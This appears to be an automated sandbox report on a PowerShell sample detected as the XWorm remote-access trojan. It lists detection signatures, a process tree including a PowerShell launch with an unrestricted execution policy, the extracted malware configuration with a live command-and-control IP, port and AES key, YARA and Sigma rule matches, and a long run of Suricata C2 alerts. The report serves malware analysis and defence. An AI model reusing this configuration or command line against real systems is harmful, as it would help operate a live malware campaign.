Edit tour

Windows Analysis Report
92.255.57.155.ps1

Overview

General Information

Sample name:	92.255.57.155.ps1
Analysis ID:	1581903
MD5:	f555029ba45bc9f18b451066721785c8
SHA1:	930ea2fb160b84b3fd841aebd5a462896eccd400
SHA256:	d6e3fbc61a201ac72495e59f7f2f3967e2ecf11f54675618a17b2ab4986e6f8b
Tags:	92-255-57-155bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected XWorm

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Injects a PE file into a foreign processes

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Uses ipconfig to lookup or modify the Windows network settings

Writes to foreign memory regions

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Abnormal high CPU Usage

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Change PowerShell Policies to an Insecure Level

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

powershell.exe (PID: 6820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6844 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ipconfig.exe (PID: 3716 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)

RegSvcs.exe (PID: 5252 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

WerFault.exe (PID: 3736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5252 -s 1736 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["92.255.57.155"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x1c9c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x9f40:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1cf0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x9fe8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1d80:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xa108:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x1b38:$cnc4: POST / HTTP/1.1
Process Memory Space: RegSvcs.exe PID: 5252	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: RegSvcs.exe PID: 5252	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x2a81a:$s8: Win32_ComputerSystem 0x2a856:$s8: Win32_ComputerSystem 0x498dd:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x49999:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x49a23:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x497ab:$cnc4: POST / HTTP/1.1

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.powershell.exe.1b599389800.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Sigma Signatures

System Summary

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", ProcessId: 6820, ProcessName: powershell.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57.155.ps1", ProcessId: 6820, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-29T09:49:16.560934+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:29.301964+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:30.464963+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:44.402294+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:58.404895+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:49:59.328119+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:03.029819+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:03.964582+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.172071+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.292081+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.455341+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:04.814163+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:05.692558+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:05.902574+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:06.044909+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:06.869260+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.045873+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.256110+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.379455+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:07.569545+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.464730+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.675163+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.803911+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:08.887654+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.074005+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.417934+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.715280+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.868985+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:10.967271+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:11.520798+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:11.611605+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:12.549466+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:12.759741+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:12.874435+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.089706+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.204806+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.342990+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.414813+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:13.545363+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:14.605324+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:14.815830+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:14.874751+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:15.026044+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:15.147035+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.090356+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.527221+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.737455+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:16.796176+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:17.067356+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:17.405988+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:17.529253+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:18.574130+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:18.784637+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:18.904468+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:19.263348+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:20.809032+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.047340+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.496954+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.539001+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:21.791442+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:22.413793+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.032242+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.218153+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.362255+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.483258+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.651202+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:23.770698+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.337402+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.590080+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.826185+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:24.920019+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.039575+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.410895+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.454605+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:25.735223+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:26.542763+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:26.795033+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.005261+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.431716+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.729998+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:27.984051+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.349203+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.647855+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.845282+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:28.964601+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.055428+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.175074+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.265968+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.385226+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:29.505083+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:30.267599+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:30.933815+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.144316+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.383523+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.503069+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:31.635012+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:32.351876+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.011259+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.370884+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.691200+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.820320+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:34.910856+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:36.402691+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:36.636705+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.028153+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.264888+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.358341+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:37.718652+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:38.077885+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:38.855270+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.065640+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.211108+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.318908+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.421416+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:39.574975+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:40.560743+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:40.797191+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:40.916824+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:41.419394+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:41.631321+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:42.699143+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:42.909380+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:43.055664+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:43.306431+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:43.639295+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.266999+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.477066+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:44.920968+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:45.944505+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:46.242158+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:46.859638+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:47.322907+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:47.401350+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:47.533207+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:48.162862+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:48.793146+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:49.003677+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:49.123194+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:49.453859+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:50.636899+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:50.892561+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:51.509171+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:51.983669+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:52.619465+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:52.796384+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:53.125986+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:53.700978+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:54.777634+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.030677+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.269249+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.522807+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.605116+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:55.902793+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:56.714702+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:56.925186+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:57.178951+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:57.255964+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:58.683506+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:59.355347+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:59.996072+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:50:59.996115+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:00.433841+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:00.730443+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
2024-12-29T09:51:01.052735+0100	2852870	1	Malware Command and Control Activity Detected	92.255.57.155	4411	192.168.2.4	49730	TCP
